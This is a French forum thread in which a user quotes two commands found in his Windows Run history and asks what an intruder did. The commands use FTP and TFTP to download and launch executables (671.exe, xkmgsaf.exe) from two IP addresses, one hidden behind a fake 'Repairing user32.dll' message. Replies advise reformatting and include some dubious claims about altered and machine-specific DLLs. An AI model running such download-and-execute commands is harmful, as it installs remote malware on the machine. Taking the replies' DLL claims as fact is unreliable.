On a essayé de pirater mon PC !

  • Auteur de la discussion tchoumak
  • Date de début
T

tchoumak

Nouveau membre
Bonjour à tous,

J'avais installé il y a quelque temps un outils permettant de prendre le controle de mon PC a distance, et malin comme je suis j'ai oublié de le désinstaller :(

Du coup ce matin j'ai vu des fenetres s'ouvrir toutes seuls, et lorsque j'ai regardé mon historique de la commande "executer", voici ce que j'ai trouvé :

cmd.exe /c del i&echo open 82.225.22.145 25276 > i&echo user 1 1 >> i &echo get 671.exe >> i &echo quit >> i &ftp -n -s:i &671.exe&del i&exit

et

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf&

Je m'en suis apercu a ce moment la, et j'ai tout bloqué, puis désactivé mon outils de controle a distance...

Quelqu'un saurais décrypter ce que le hackeur a voulu faire ?

Merci d'avance !
 
Neoryuki

Neoryuki

Grand Maître
visiblement deja il a installer plusieurs exe sur ton poste, notamment 671.exe et xkmgsaf.exe, et modifié une DLL système

Mon meilleur conseil : tu debranche tout de suite ton modem, et tu formates dans la foulée :D

Pour information :
82.225.22.145 => IP de chez Free
69.157.107.38 => IP de chez BELL CANADA

671.exe =>
Vous devez être connecté pour voir les liens.

xkmgsaf.exe => inconnu
 
T

tchoumak

Nouveau membre
Merci pour ton analyse Neoryuki, mais je pense que cette solution est plutot radicale !

Je viens d'installer spy doctor, pour essayer de cleaner ce qu'il a fait...
 
Neoryuki

Neoryuki

Grand Maître
non mais là c'est mort, si il a subilisé certaines DLL systemes, tu pourras utiliser n'importe quel logiciel de securité, son fonctionnement sera faussé parce que le systeme n'interpretera pas les commandes correctement, puisque le fonctionnement du coeur du systeme est altéré

Mais apres tu fais comme tu veux [:spamafote]
 
T

tchoumak

Nouveau membre
Hum et si je remplace la DLL "user32.dll" altéré par une toute neuve, trouvé sur un autre PC, ca pourrais fonctionner ?
 
fredcrash

fredcrash

Expert
Non , meme si tu prend des dll de d'autre PC, ce n'est pas forcement les memes infos qu'il y a dedans car ils sont modifiés en fonction des logiciels qui sont installés et qui utilisent cette meme dll.
Il y a qu'une seule solution dans ce cas: FORMATER .
 
B

bmax14

Grand Maître
Oui désoler mais la c'est obligatoire, sous peine de devoir vivre avec un PC "zombie", mais alors ne t'étonne pas si la police vient te dire bonjour un de ces jours...

Et tien tant que tu formatte (et donc que tu perd toutes tes donnée, pense à sauvergarder :) ) essaye un coup un linux ou autre, c'est le moment ou jamais!

Note : Je ne tente pas de te faire ralier une cause qui n'est pas tienne, mais juste de relativiser l'événement en te montrant comment en profiter.
 
Vous devez vous inscrire ou vous connecter pour répondre ici.
Dernières actus
Derniers messages publiés
Statistiques globales
Discussions
730 128
Messages
6 717 845
Membres
1 586 373
Dernier membre
https://forum.tomshardwar
Partager cette page
Haut